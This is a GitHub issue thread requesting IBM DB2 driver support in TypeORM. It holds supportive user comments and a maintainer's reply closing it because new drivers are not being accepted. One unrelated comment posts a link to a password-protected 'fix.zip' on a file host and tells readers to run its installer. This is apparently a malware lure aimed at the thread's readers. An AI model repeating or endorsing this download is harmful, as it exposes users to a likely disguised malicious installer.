### ISSUE TITLE
Request for IBM DB2 Database Support in TypeORM

### ISSUE THREAD

**Issue by benissonbb** [typeorm/typeorm#11043]
### Feature Description

I would like to request support for the IBM DB2 database in TypeORM. Currently, there is no official support for DB2, which limits the usage of TypeORM in environments where DB2 is the primary database system.

I have noticed a previous issue regarding DB2 support ([Issue #2699](https://github.com/typeorm/typeorm/issues/2699)), which was opened in 2018 but was closed without implementation. As DB2 remains a critical database system for many enterprise environments, I believe that adding official support for DB2 would greatly benefit the TypeORM community.

### The Solution

Previous Issues: There was a discussion in Issue #2699 about the need for DB2 support, but it was closed without plans for implementation. Additionally, there are related discussions in [Issue #4](https://github.com/typeorm/typeorm/issues/4) regarding the addition of more database drivers, where DB2 is mentioned.
Importance of DB2: IBM DB2 is widely used in enterprise applications, and its support in TypeORM would expand the ORM's applicability and adoption in large-scale systems.
Community Contribution: If there is no immediate plan for implementing DB2 support, could the team provide guidance on how the community could contribute to this feature? I would be willing to collaborate with others to make this happen.
Please consider this request as an opportunity to enhance TypeORM's versatility and reach. Thank you for your ongoing work on this project.

### Considered Alternatives

.

### Relevant Database Driver(s)

- [ ] aurora-mysql
- [ ] aurora-postgres
- [ ] better-sqlite3
- [ ] cockroachdb
- [ ] cordova
- [ ] expo
- [ ] mongodb
- [ ] mysql
- [ ] nativescript
- [ ] oracle
- [ ] postgres
- [ ] react-native
- [ ] sap
- [ ] spanner
- [ ] sqlite
- [ ] sqlite-abstract
- [ ] sqljs
- [ ] sqlserver

### Are you willing to resolve this issue by submitting a Pull Request?

Yes, I have the time, and I know how to start.

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by benissonbb** [comment]
I started the implementation to add support for DB2. What tests need to be performed to submit the PR?

**Comment by livewater1977** [comment]
If I get this, sure it would make my job far easier, as many requests are done to a DB2 database.

**Comment by Perrut** [comment]
Muito interessante. Também possuo essa necessidade. Agilizaria bastante o processo de desenvolvimento.

**Comment by dioats** [comment]
DB2 is used a lot where I work. It would benefit not only me and my team but the entire company. Great proposal.

**Comment by Maumal** [comment]
I have the same problem.

**Comment by rogeriobautz** [comment]
It would be much easier to deal with db2 using typeorm. I hope it comes through.

**Comment by stim371** [comment]
Thank you for the request.

As we bring TypeORM back into active development, we have decided not to accept any new driver requests at this time. This allows us to focus on improving and supporting the core platform.

This issue will be closed for now, but will be labeled with "new driver" so it is easily findable in the future.
